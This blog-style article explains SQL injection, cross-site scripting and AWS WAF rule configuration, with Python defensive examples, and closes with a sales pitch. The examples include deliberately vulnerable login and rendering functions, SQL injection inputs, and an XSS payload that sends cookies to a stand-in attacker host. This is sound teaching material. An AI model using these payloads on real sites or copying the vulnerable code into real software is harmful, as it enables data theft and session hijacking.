Tackling OWASP Top 10 with AWS WAF


I know what you’re thinking. That is a lot of acronyms. Let’s break down the problem we’re tackling. The Open Web Application Security Project (OWASP) is an online community that produces freely available articles, methodologies, documentation, tools and technologies in the field of web application security. The OWASP Top 10 is a document aimed at developers and security professionals that highlights the most critical and prevalent web application security risks and how to mitigate them.

AWS WAF is a web application firewall that helps protect your web applications and APIs against common web exploits by evaluating each HTTP request against a set of rules designed to identify and block common attack patterns such as SQL injection and cross-site scripting. It filters traffic in front of the application; it does not remove the underlying bug, so the code-level defences below still matter.

SQL Injection

Any application that uses a SQL-based data storage layer needs to be prepared to deal with SQL injection. The attack consists of supplying SQL syntax in an input field (a form value, URL parameter, header or API body) that the application concatenates into the query it sends to the database server, changing the meaning of the predefined, authorised statement. If a web app is vulnerable, the attack’s severity is limited only by the attacker’s skill and imagination, and by the privileges of the database account the application connects with. An educated attacker can read sensitive data from the database by injecting additional SELECT clauses (for example UNION SELECT) and joins, or modify data using UPDATE and DELETE statements.

There are several layers of defence. Parameterised queries (prepared statements) are the primary one: the SQL text is fixed and the user-supplied values are bound separately, so the database never parses input as part of the statement, and a quote or comment marker in the input cannot close one clause and open another. Input validation should still be performed on the backend server as well as in the frontend interface, because client-side checks are trivially bypassed. Finally, the application’s database account should have only the access it requires; if the application simply reads from a database, there is no reason to give it write access, which caps what a successful injection can do.
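To make the three defences concrete, here is an added example (not code from the original article) in Python against an in-memory SQLite database. The `users` table, the credentials in it and the attacker inputs are all constructed for the demonstration. The vulnerable login builds its query by string formatting; the hardened one binds parameters. The `read_only` helper stands in for a least-privilege database role by using SQLite’s authorizer hook to refuse writes on the connection.

```python
import sqlite3

# Constructed sample data for this example; not real credentials.
SEED_USERS = [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with the constructed users above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)", SEED_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query text built by string formatting: the input is parsed as SQL."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    """Prepared statement with bound parameters: the statement text is fixed
    and the values travel separately, so quotes and '--' stay plain data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def read_only(conn):
    """Least privilege at the connection: deny INSERT/UPDATE/DELETE even if a
    query slips through. A production app would use a read-only DB role;
    SQLite's authorizer hook stands in for that here."""
    writes = {sqlite3.SQLITE_INSERT, sqlite3.SQLITE_UPDATE, sqlite3.SQLITE_DELETE}

    def authorizer(action, arg1, arg2, dbname, source):
        return sqlite3.SQLITE_DENY if action in writes else sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)
    return conn


def delete_user(conn, username) -> bool:
    """Returns True if the delete ran, False if the connection refused it."""
    try:
        conn.execute("DELETE FROM users WHERE username = ?", (username,))
        conn.commit()
        return True
    except sqlite3.DatabaseError:
        return False


if __name__ == "__main__":
    db = make_db()
    # A comment marker truncates the password check in the vulnerable query.
    print(login_vulnerable(db, "alice' --", "wrong"))
    print(login_parameterized(db, "alice' --", "wrong"))
    # A tautology in the password field returns whichever row comes first.
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))
    # Same DELETE, with and without the read-only connection.
    print(delete_user(read_only(make_db()), "bob"))
    print(delete_user(make_db(), "bob"))
```

Run it and compare the two login functions on the same inputs: the formatted query accepts `alice' --` and `' OR '1'='1`, the parameterised one treats them as literal, non-matching strings. Note that Python’s `sqlite3` driver also refuses stacked statements in `execute`, so a `; DELETE ...` payload fails for a different reason; the read-only connection is what protects you when the driver or database is less strict.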

Cross-Site Scripting

Cross-Site Scripting (XSS) is also an injection attack. Here the attacker uses an input form or API to submit malicious content, generally a browser-side script, which the application stores (in a database, for stored XSS) and later includes in pages served to other users’ browsers, or reflects straight back in its response. Because the script arrives from a trusted origin (the genuine web server), the browser executes it with the page’s privileges, and it can read or transmit information the browser holds for that site, such as cookies, session tokens or other sensitive data.

These attacks can occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. As with SQL injection, input should be validated on both the front end and the back end, but the decisive control for XSS is output encoding: escape each value for the context it is written into (HTML body, attribute, URL or script) at the point it is rendered.
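The following added example (not from the original article) renders a list of stored comments two ways in Python. The comment records, including the planted script and `javascript:` link, are constructed to play the role of rows an attacker has already written to the database. The vulnerable renderer interpolates them into HTML as-is; the hardened one entity-encodes text and applies a scheme allowlist to the link attribute, since encoding alone does not neutralise a `javascript:` URL in an `href`.

```python
import html
from urllib.parse import urlsplit

# Constructed comment records, standing in for rows a stored-XSS payload
# would have planted in the database through the comment form.
COMMENTS = [
    {"author": "alice", "body": "Great post!", "site": "https://example.com/?ref=1&x=2"},
    {
        "author": "mallory",
        "body": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
        "site": "javascript:alert(document.cookie)",
    },
]


def render_vulnerable(comment: dict) -> str:
    """Interpolates stored fields straight into the HTML. The browser cannot
    tell the comment text from the page's own markup, so the script runs."""
    return (
        f'<li><a href="{comment["site"]}">{comment["author"]}</a>: '
        f'{comment["body"]}</li>'
    )


def safe_href(url: str) -> str:
    """Attribute context: allow only http(s) links, then entity-encode. Anything
    else (javascript:, data:, scheme-relative) is replaced with a harmless '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_escaped(comment: dict) -> str:
    """Encodes each value for the context it lands in: entity-encoding for
    text nodes, entity-encoding plus the scheme check for the href attribute."""
    return (
        f'<li><a href="{safe_href(comment["site"])}">'
        f'{html.escape(comment["author"])}</a>: '
        f'{html.escape(comment["body"])}</li>'
    )


def render_page(comments, renderer) -> str:
    """Assemble the comment list with the chosen renderer."""
    return "<ul>\n" + "\n".join(renderer(c) for c in comments) + "\n</ul>"


if __name__ == "__main__":
    print(render_page(COMMENTS, render_vulnerable))
    print()
    print(render_page(COMMENTS, render_escaped))
```

In the escaped output the payload survives as visible text (`&lt;script&gt;...`) rather than as an element, and the poisoned link collapses to `href="#"`. Real templating engines (Jinja2 with autoescape, for instance) do the text-node encoding for you, but the attribute and URL contexts still need the explicit check shown in `safe_href`.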

How does WAF help

We mentioned that WAF uses a set of rules. These rules can be provided and managed by AWS (managed rule groups such as the Core rule set and the SQL database rule set), purchased from third parties through the AWS Marketplace, or fully customised and designed in-house. The AWS-managed groups are updated frequently to address new threats. Rules are grouped into a web ACL and evaluated in priority order against every layer of a request, from the source IP address to the HTTP headers, query string and body. Because managed rules are pattern-based, they can produce false positives on legitimate traffic; the usual practice is to deploy a new rule group in Count mode first and switch it to Block once the logs show it behaves.

WAF can be associated with a variety of entry points into your cloud environment: CloudFront, Application Load Balancer, API Gateway and AppSync all have built-in support, allowing you to apply consistent rules across all ingress paths.

AWS WAF includes a full-featured API, so web ACLs and rules can be defined as code and applied at multiple points in the development process: during development, at deployment, and for post-deployment management and auditing.
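As an added example of defining a web ACL as code (this is not the original article’s code or a configuration from AWS), the Python below assembles a WAFv2 web ACL that combines AWS-managed rule groups with two custom rules built on WAF’s own `SqliMatchStatement` and `XssMatchStatement`, checks the constraints the API would otherwise reject at submission time, and emits the JSON for `aws wafv2 create-web-acl --cli-input-json`. The ACL name, metric names and rule names are placeholders chosen for this example; the scope, statement types, managed rule group names and text transformation types are real WAFv2 values. No AWS call is made.

```python
import json

# Assumed placeholder names for this example. Scope REGIONAL covers ALB, API
# Gateway and AppSync; CLOUDFRONT web ACLs must be created in us-east-1.
REGIONAL = "REGIONAL"
CLOUDFRONT = "CLOUDFRONT"


def visibility(metric: str) -> dict:
    """CloudWatch metric and sampled-request settings required on every rule."""
    return {"SampledRequestsEnabled": True, "CloudWatchMetricsEnabled": True,
            "MetricName": metric}


def managed_rule_group(name: str, priority: int, count_only: bool = False) -> dict:
    """Reference an AWS-managed rule group. Managed groups carry their own rule
    actions, so the wrapper sets OverrideAction: None enforces them, Count
    observes what they would do without blocking."""
    return {
        "Name": f"AWS-{name}",
        "Priority": priority,
        "Statement": {"ManagedRuleGroupStatement": {"VendorName": "AWS", "Name": name}},
        "OverrideAction": {"Count": {}} if count_only else {"None": {}},
        "VisibilityConfig": visibility(f"AWS-{name}"),
    }


def custom_match_rule(name, priority, statement_key, field, transformations) -> dict:
    """Custom blocking rule using WAF's built-in SQLi or XSS detector against
    one request field, decoding the field before inspection so encoded
    payloads are seen in their decoded form."""
    return {
        "Name": name,
        "Priority": priority,
        "Statement": {statement_key: {
            "FieldToMatch": field,
            "TextTransformations": [{"Priority": i, "Type": t}
                                    for i, t in enumerate(transformations)],
        }},
        "Action": {"Block": {}},
        "VisibilityConfig": visibility(name),
    }


def validate_rules(rules) -> None:
    """Constraints WAF enforces on create/update, caught before the call:
    unique priorities, exactly one of Action/OverrideAction per rule, and
    OverrideAction only on rule group references."""
    priorities = [r["Priority"] for r in rules]
    if len(set(priorities)) != len(priorities):
        raise ValueError("rule priorities must be unique")
    for r in rules:
        has_action, has_override = "Action" in r, "OverrideAction" in r
        if has_action == has_override:
            raise ValueError(f"{r['Name']}: exactly one of Action/OverrideAction")
        is_group = ("ManagedRuleGroupStatement" in r["Statement"]
                    or "RuleGroupReferenceStatement" in r["Statement"])
        if is_group != has_override:
            raise ValueError(f"{r['Name']}: group references use OverrideAction")


def is_valid(rules) -> bool:
    try:
        validate_rules(rules)
        return True
    except ValueError:
        return False


def build_web_acl(name: str, scope: str = REGIONAL) -> dict:
    """OWASP-style baseline: managed groups first, then narrow custom rules."""
    decode = ["URL_DECODE", "HTML_ENTITY_DECODE"]
    rules = [
        managed_rule_group("AWSManagedRulesCommonRuleSet", 0),
        managed_rule_group("AWSManagedRulesSQLiRuleSet", 1),
        managed_rule_group("AWSManagedRulesKnownBadInputsRuleSet", 2, count_only=True),
        custom_match_rule("sqli-in-body", 10, "SqliMatchStatement", {"Body": {}}, decode),
        custom_match_rule("xss-in-query", 11, "XssMatchStatement", {"QueryString": {}}, decode),
    ]
    validate_rules(rules)
    return {
        "Name": name,
        "Scope": scope,
        "DefaultAction": {"Allow": {}},
        "Description": "Managed SQLi/XSS groups plus custom match rules",
        "Rules": rules,
        "VisibilityConfig": visibility(name),
    }


def to_cli_input(acl: dict) -> str:
    """JSON for: aws wafv2 create-web-acl --cli-input-json file://webacl.json"""
    return json.dumps(acl, indent=2)


if __name__ == "__main__":
    print(to_cli_input(build_web_acl("owasp-baseline")))
```

The third managed group is deliberately added in Count mode, which is how you would stage a new rule group: watch the sampled requests and logs for a while, then flip `count_only` to enforce it. Keep the custom rules narrow (one field, specific transformations) so that a false positive is easy to trace back to the rule that caused it.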

Logging is not an afterthought with WAF: it can record each inspected web request’s full headers, together with the rule that matched and the action taken, for use in security automation, analytics or auditing. If any issues are found, rules can be added or modified and the change propagates to every associated resource in under a minute.

Conclusion

Our team offers solutions that allow businesses in a wide range of industries to unlock their potential while remaining compliant, secure and competitive. Reach out to us today to learn more about our process or start your journey.